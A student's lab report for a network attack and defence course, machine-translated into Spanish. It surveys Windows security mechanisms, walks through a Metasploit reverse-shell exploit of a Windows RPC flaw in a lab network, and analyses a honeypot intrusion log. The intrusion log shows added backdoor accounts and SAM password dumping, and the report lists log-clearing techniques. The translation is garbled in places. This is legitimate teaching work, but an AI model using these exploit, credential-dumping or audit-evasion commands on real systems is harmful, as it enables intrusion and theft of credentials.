20199328 2019-2020-2 "Ataque de red y práctica de defensa" Asignación de la semana 7

Others 2020-04-13 08:40:19 views: null

20199328 2019-2020-2 "Ataque de red y práctica de defensa" Asignación de la semana 7

1. Practica el contenido

Descripción general del marco básico del sistema operativo Windows

La estructura básica del sistema operativo Windows.

Los módulos básicos del núcleo del sistema operativo Windows:

  • Ejecutable de Windows: la interfaz superior del núcleo del archivo de Windows ntoskrnl.exe, que contiene los servicios básicos del núcleo del sistema operativo
  • Cuerpo del núcleo de Windows: es decir, el archivo del núcleo del núcleo moskrnl.exe del núcleo de Windows implementa el código y el código de soporte de la arquitectura de hardware para implementar las funciones subyacentes del sistema operativo
  • Controladores de dispositivos: incluidos los controladores de dispositivos de hardware que asignan las operaciones de E / S de los usuarios a las solicitudes de E / S de dispositivos de hardware específicos, así como los controladores de dispositivos de red y del sistema de archivos
  • Capa de abstracción de hardware: el archivo hal.dll es el código subyacente utilizado para proteger las diferencias entre el kernel de Windows y el hardware de la plataforma.
  • Ventana de Windows y código de implementación del kernel de la interfaz de la interfaz gráfica: archivo win32k.sys

El módulo de código del modo de usuario del sistema Windows:

  • Proceso de soporte del sistema: el proceso de servicio integrado del sistema que se inicia automáticamente cuando se inicia Windows
  • Proceso de servicio del subsistema ambiental: proporciona un proceso de servicio para el entorno operativo del sistema operativo
  • Proceso de servicio: una serie de sistemas y servicios de red iniciados a través del mecanismo de administración de servicios de Windows
  • Software de aplicación de usuario: varios programas de aplicación de usuario ejecutados en modo de usuario
  • DLL del subsistema principal: a saber, kemel32.dll / user32.dll / gdi32.dll / advapi32.dll y otros archivos de biblioteca de enlaces dinámicos

Los siguientes mecanismos principales se implementan en el núcleo del sistema operativo Windows:

  • Mecanismo de administración de memoria de Windows: el espacio de memoria virtual de Windows se divide en dos partes: el intervalo de memoria central del sistema y el intervalo de memoria del usuario
  • Mecanismo de administración de archivos de Windows: sistema de archivos NTFS de la lista de control de acceso de ACL para garantizar la seguridad de la lectura / escritura de recursos de archivos, más segura que FAT, además de un mayor rendimiento, confiabilidad y eficiencia de utilización del disco
  • Mecanismo de administración del registro de Windows: el registro del sistema de Windows sirve como un depósito de almacenamiento para la configuración global del sistema, la información de configuración del software de usuario y aplicación, y juega un papel clave en la configuración y el control del sistema de Windows
  • El mecanismo de red de Windows: drivers Los controladores de dispositivo de varios hardware de tarjeta de red generalmente son desarrollados y proporcionados por fabricantes de hardware de terceros, y se encuentran en la capa física del modelo de referencia OSl. Library Biblioteca NDIS (Especificación de interfaz de controlador de red) y controlador de minipuerto, capa de enlace OSI a nivel de bits, construir una interfaz de encapsulación entre varios controladores de adaptador de tarjeta de red y capa de transmisión TDI ③TDI, capa de transmisión, formatear solicitud de red en IRP y aplicación para la dirección de red y la comunicación de datos. API de red DLL y cliente TDI, capa de sesión y capa de presentación, proporcionando interacción de red e implementación independiente de protocolos específicos. Implementación de interfaz I, enviando IRP al controlador de protocolo de red de capa de transporte TDI. Solicitud para completar la operación de comunicación de red específicamente solicitada por la API.

Arquitectura y mecanismo de seguridad del sistema operativo Windows

  • Arquitectura de seguridad de Windows: modelo de monitor de referencia base del sistema operativo Windows (Monitor de referencia) para lograr el modelo de seguridad de objeto básico
  • Mecanismo de autenticación de identidad de Windows: en el sistema operativo Windows, el concepto principal de seguridad se utiliza para incluir todos los objetos de entidad que realizan solicitudes de acceso a recursos del sistema; Windows configura cuentas para cada usuario y computadora para administrar; la contraseña de la cuenta de usuario de Windows está encriptada Después de eso, se guarda en SAM o Active Directory AD; para los usuarios que intentan usar sistemas Windows y computadoras remotas y otros principios de seguridad, Windows usa cierta información secreta para autenticar la identidad verdadera y legal del principal de seguridad y realizar la autenticación de identidad del usuario; proceso Winlogon, gráfico GINA La ventana de inicio de sesión y el servicio LSASS colaboran para completar el proceso de autenticación de identidad local

Autorización de Windows y mecanismo de control de acceso:

  • El mecanismo de autorización y control de acceso de Windows se basa en el modelo Thousand Reference Monitor. Lo implementa el módulo SRM en el kernel y el servicio LSASS en modo usuario. SRM se utiliza como intermediario cuando el sujeto de seguridad accede a los recursos del objeto, de acuerdo con el control de acceso establecido Acceso autorizado de la lista; Windows extrae todos los recursos del sistema para protegerlos en objetos, un Descriptor de seguridad SD (Descriptor de seguridad), cada objeto estará asociado con un descriptor de seguridad de objeto, que consta de los siguientes atributos principales:
    • SID del propietario : El identificador de seguridad SID del propietario del objeto.
    • Group SID: el identificador de seguridad SID del grupo de usuarios básico donde se encuentra el objeto (compatible con POSJX).
    • Lista de control de acceso autónomo DACL: especifica qué
    middleware de seguridad puede acceder al objeto de qué manera • Lista de control de acceso de auditoría del sistema SACL: especifica qué operaciones de acceso iniciadas por qué middleware deben ser auditadas.

Mecanismo de auditoría de seguridad de Windows:

  • El administrador del sistema define la estrategia de auditoría del sistema en la estrategia de seguridad local para determinar qué eventos registra el sistema

Otros mecanismos de seguridad de Windows:

  • Uno de los mecanismos de seguridad más importantes es el Centro de seguridad de Windows introducido por Windows XP SP2

Tecnología de defensa y ataque de seguridad remota de Windows:

  • Atacar los servicios de red de Windows: Windows tiene vulnerabilidades de seguridad de alto riesgo que pueden conducir a la ejecución remota de código. Los atacantes también han estado utilizando estas vulnerabilidades para llevar a cabo ataques de penetración remota en los servicios de red de Windows para obtener acceso a los sistemas de Windows.
  • Ataques de descifrado y descifrado de contraseñas remotas: la forma más sencilla de penetrar de forma remota en los sistemas Windows es adivinar o descifrar la contraseña de inicio de sesión del sistema
  • Ataque a clientes y usuarios de Windows: los ataques de penetración de clientes contra navegadores web y aplicaciones de terceros se han vuelto muy populares. Además, los atacantes utilizarán técnicas de ingeniería social para engañar a los usuarios finales para que los ayuden a ejecutar código malicioso con fines disfrazados o Software de pícaro

Ciclo de vida de la vulnerabilidad de seguridad del sistema de Windows:

  • Proceso de ataque de prueba de penetración para objetivos específicos: prueba de escaneo de Yongdong-> encontrar código de penetración para vulnerabilidades descubiertas-> implementar prueba de penetración

Elevación de los privilegios locales de Windows: después de que un atacante obtenga derechos de usuario limitados en el sistema Windows, inmediatamente recibirá los privilegios finales: administrador o cuenta de LocalSystem.
Robo de información confidencial de Windows:

  • Tecnología de extracción de texto cifrado de contraseña del sistema de Windows: ① copie el archivo de texto cifrado de contraseña en el sistema de archivos después de comenzar desde otro sistema operativo ② use la herramienta rdisk en el kit de herramientas de reparación de disco duro, ejecute el comando "rdisk / s-" para crear una copia del archivo de copia de seguridad SAM ③Utilice las herramientas de la serie pwdumpX para extraer el texto cifrado de la contraseña directamente del archivo SAM o del directorio activo
  • Tecnología de descifrado de contraseñas del sistema de Windows: después de obtener el archivo de texto cifrado de contraseña, el siguiente paso es implementar el descifrado de texto cifrado y descifrar la contraseña del usuario.
  • Robo de datos confidenciales para el usuario: para los archivos de los usuarios en el sistema, el atacante puede ejecutar find, findtr, grep y otras herramientas de línea de comandos para implementar la búsqueda. Con algún software potente de puerta trasera, el atacante también puede usar el keylogger. ) Para monitorear la entrada del teclado del usuario
  • Precauciones contra el robo de información confidencial local: usuario privilegiado administrador, elija una buena contraseña

Windows desaparece:

  • Deshabilitar la función de auditoría: el atacante usa el parámetro "deshabilitar" del programa auditpol para deshabilitar la función de auditoría del sistema de Windows.
  • Limpie el registro de eventos: el atacante limpiará las pistas que quedan en el registro de eventos. Después de que el atacante obtenga el permiso de administrador, puede controlar el sistema de destino a través de la tabla remota
  • Medidas preventivas contra la desaparición y la desaparición: el defensor debe configurar de antemano las funciones de auditoría del sistema y la auditoría del servicio de red
  • Control remoto de Windows y programas de puerta trasera: los atacantes suelen implantar programas de puerta trasera y control remoto de terceros en sistemas controlados, divididos principalmente en herramientas de control remoto de línea de comandos y herramientas gráficas de control remoto.

2. Proceso de práctica

Experimento uno: práctica práctica del atacante de Windows Metasploit

  • Tarea: utilice el software metasploit para realizar experimentos de estadísticas remotas de penetración remota
  • Contenido de la tarea específica: use la máquina de ataque Windows Attacker / BT4 para intentar un ataque de penetración remota en la vulnerabilidad MS08-067 en la máquina objetivo de Windows Metasploitable para obtener acceso al host objetivo
  • En primer lugar, aquí usamos ms03_026 como la vulnerabilidad objetivo de nuestro ataque, y los scripts de ataque relacionados a través del uso exploit / windows / dcerpc / ms03_026_dcom
  • A continuación, establezca la carga útil del ataque. El significado relevante de la carga útil se mencionó anteriormente. Use el comando set PAYLOAD windows / meterpreter / reverse_tcp para configurar la carga para abrir la conexión inversa
  • Configure la máquina objetivo de la víctima, a través del comando set RHOST 192.168.91.132
  • Configure el host atacante, a través del comando set LHOST 192.168.91.129
  • Luego, lanza un ataque a través de exploit
  • Después de que regrese el meterpreter, el ataque es exitoso
  • Abra el caparazón de la máquina de destino.
  • Verifique que el ataque sea exitoso
  • Crear archivo
  • Vista de archivo de destino
  • Ver permisos (que se consideran permisos del sistema)




Experimento 2: decodifica un ataque exitoso del sistema NT

Un atacante de 213.116.251.162 comprometió con éxito un host honeypot 172.16.1.106 (nombre de host lab.wiretrip.net) desplegado por rfp, que requirió la extracción y el análisis de todo el proceso del ataque.

  • ¿Qué herramientas de craqueo usó el atacante para atacar?
  • Cómo el atacante usó esta herramienta de craqueo para ingresar y controlar el sistema
  • Lo que hizo el atacante después de obtener acceso al sistema
  • ¿Cómo prevenimos tales ataques?
  • ¿Crees que el atacante está alerta de que su objetivo es un host honeypot? Si es así, ¿por qué?

Abra el archivo .log con wireshark y descubra que hay muchos mensajes http. Utilice la herramienta estadística que viene con wireshark. Haga clic en Estadísticas-> http-> Solicitud . Encontré muchas operaciones en dos lugares, hay dos archivos sospechosos, uno es cmd1.exe, el otro es boot.ini (este es el archivo de inicio del sistema NT), simplemente rastreó boot.ini y encontró El atacante parece estar ayudando al atacado a encontrar lagunas, o puede ser una broma, pero luego descubrió que trató de ver varios archivos y conversaciones en este host, y también agregó, eliminó y modificó varios archivos para verificar el servicio abierto Al verificar el usuario de creación, etc., se encontraron algunos datos al rastrear, aquí creo que no encontró que esto sea un honeypot, hay una imagen como evidencia.



El siguiente es el resultado del seguimiento de boot.ini: se puede ver que el proceso de operación general

dir
dir
.[Adir
dir
del ftpcom
ls.
dir
type readme.e
c:.
cd\
dir
rm ..
del fun
dir
cd exploites
dir
cd exploits
dir
cd microsoft
dir
cd ..
cd newfiles
dir
cd ..
cd unix
dir
cd ..
dir
cd ..
dir
dir
dir'
dir
cat yay
type yay.
type yay.txt
net session
net users
dir
type yay2.txt
del yay2.txt
net session >>yay3.txt
dir
del yay&.*
dir
del yay*
del yay3.txt
dir
dir
yuper .....
type heh.txt
del heh.txt
cd program files
dir
cd ..
dir
echo Hi, i know that this a ..is a lab server, but patch the holes! :-) >>README.NOW.Hax0r
dir
dir
net group
net localgroup
net group domain admins
.[Anet group /?
net group ??
net group /?
net group 
net localgroup
net localgroup /domain admins
net localgroup domain admins
net users
net session
.[A.[A.[Anet localgroup domain admins
net group domain admins
net localgroup administrators
.[Anet localgroup administrators
net localgroup administrators
net session
dir
cd program files
dir
cd common files
dir
cd obdc
dir
cd microsoft shadr..red
cd microsoft shared
dir
cd ..
cd odbc
dir
cd data dou
cd data sources
dir
cd..
cd ..
dir
cd system
dir
cd msads
dir
cd msas.dcs
cd msadc
dir
psu
pdump
net start
net localgroup administrators
dir..
net users
net users
net users /?
net users hi guy /ADD
/net..
netnet password
net user
net user /?
net user himan HarHar666 /ADD
net name
net user
net user Administrator
cd /winnt
dir
cd \winnt
cd C:\Program Files\Common Files\System\msadc
del c
del samdump.dll
del pdump.exe
del 
cd\winnt
cd resp..
cd repair
dir
rdisk -s/
d.rd
rdisk -/s
dir
rdisk
rdisk -s
dir
cat 
type sam._
dir
dir
dir
dir
dir
dir
dir
c:
dir
cd\
dir
type har.txt
......dir
......dir
......cd wiretrip
......exit...
......exit
......

Continúe verificando y descubrió que está buscando el archivo msadcs.dll del servidor y el archivo de biblioteca de enlaces dinámicos de Windows, que a menudo se ve en el disco del sistema. Debe ser muy importante, por lo que examinó y vio que realizó la instrucción sql para consultar. Obtuve datos relevantes para un mayor acceso, luego encontré pdump.exe y descubrí que no se puede usar en DOS. . . Después de mucho esfuerzo, descubrió que finalmente leía har.txt y sintió que esta era una pista decisiva, por lo que realizó varios filtros y pruebas de detección, y descubrió que era un honeypot. Si este tipo de vulnerabilidad se repara a tiempo, actualice a tiempo Varios cortafuegos enchufables o algo así.


Practica tres

El atacante usa metaploit para seleccionar la vulnerabilidad al ataque y obtener el control.

El defensor utiliza wireshark para monitorear los paquetes de red obtenidos, analizar el proceso de ataque y obtener información relevante.

El proceso de ataque es el mismo que en la práctica 1. Se puede ver que el ataque comienza desde ARP, desde el puerto 192.168.91.130 1046 hasta el puerto 192.168.91.132 135. La vulnerabilidad MS08-067 se activa cuando se llama a la función NetPathCanonicalize en el programa de servicio del servidor a través del canal MSRPC sobre SMB. Por lo tanto, se puede inferir de tantos paquetes de datos SMB que se utilizó esta vulnerabilidad


3. Problemas encontrados en el aprendizaje y las soluciones.

  • Pregunta 1: Experimento 2 No sé cómo comenzar
  • Problema 1 Solución: eche un vistazo a los blogs de otras personas para tener una idea general

4. Resumen de la práctica

Siento que el Experimento 2 es un poco difícil. . .

Supongo que te gusta

Origin www.cnblogs.com/llj76720197/p/12689121.html
Recomendado
Clasificación
Diario
Más
2024-05-19(0)
2024-05-18(30)
2024-05-17(4)
2024-05-16(22)
2024-05-15(5)
2024-05-14(10)
2024-05-13(7)
2024-05-12(22)
2024-05-11(31)
2024-05-10(32)

Code World

© 2018 codetd.com